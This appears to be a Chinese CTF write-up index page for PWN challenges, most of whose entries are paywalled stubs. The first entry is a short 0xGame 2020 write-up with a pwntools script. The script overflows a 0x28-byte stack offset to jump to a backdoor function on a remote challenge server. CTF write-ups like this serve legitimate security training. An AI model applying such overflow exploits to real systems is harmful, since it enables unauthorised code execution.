-
0xGame 2020
没开金丝雀,`read`函数读取大小为64字节变量`s`距离`r`处是`0x28`个字节后门函数地址是`0x0401162````pythonfrompwnimport*p=process('./main')p=remote('49.232.142.230',11228)p.sendafter("?",b'A'*0x28+p64(0x401162))p.interactive()```
- PWN
- 20天前
-
原神祈愿wp
***收费WriteUP请购买后查看,VIP用户可免费查看***
-
5 金币
- PWN
- 1月前
-
printf
***收费WriteUP请购买后查看,VIP用户可免费查看***
-
5 金币
- PWN
- 1月前
-
瑞士军刀wp
这个命令没有回显
- PWN
- 2月前
-
TAMUctf 2019 PWN1
***收费WriteUP请购买后查看,VIP用户可免费查看***
-
1 金币
- PWN
- 1年前
-
first-pwn
***收费WriteUP请购买后查看,VIP用户可免费查看***
-
1 金币
- PWN
- 1年前
-
ez_fmt
***收费WriteUP请购买后查看,VIP用户可免费查看***
-
5 金币
- PWN
- 1年前
-
canary2 wp
***收费WriteUP请购买后查看,VIP用户可免费查看***
-
5 金币
- PWN
- 1年前
-
heap1-fixed_wp
***收费WriteUP请购买后查看,VIP用户可免费查看***
-
1 金币
- PWN
- 1年前
-
heap1-wp
***收费WriteUP请购买后查看,VIP用户可免费查看***
-
1 金币
- PWN
- 1年前
-
simple-storm wp
***收费WriteUP请购买后查看,VIP用户可免费查看***
-
5 金币
- PWN
- 2年前
-
Baby-heap2 writeup
***收费WriteUP请购买后查看,VIP用户可免费查看***
-
1 金币
- PWN
- 2年前
-
PWN1JIETI
***收费WriteUP请购买后查看,VIP用户可免费查看***
-
2 金币
- PWN
- 2年前
-
瑞士军刀
***收费WriteUP请购买后查看,VIP用户可免费查看***
-
2 金币
- PWN
- 3年前
-
Easy_int wp
***收费WriteUP请购买后查看,VIP用户可免费查看***
-
10 金币
- PWN
- 4年前
-
Baby-heap1 writeup
***收费WriteUP请购买后查看,VIP用户可免费查看***
-
6 金币
- PWN
- 4年前
-
pwn7_repeater
***收费WriteUP请购买后查看,VIP用户可免费查看***
-
11 金币
- PWN
- 4年前
-
pwn07
***收费WriteUP请购买后查看,VIP用户可免费查看***
-
10 金币
- PWN
- 5年前
-
pwn6 格式化字符串漏洞
***收费WriteUP请购买后查看,VIP用户可免费查看***
-
8 金币
- PWN
- 5年前
-
pwn3
***收费WriteUP请购买后查看,VIP用户可免费查看***
-
6 金币
- PWN
- 5年前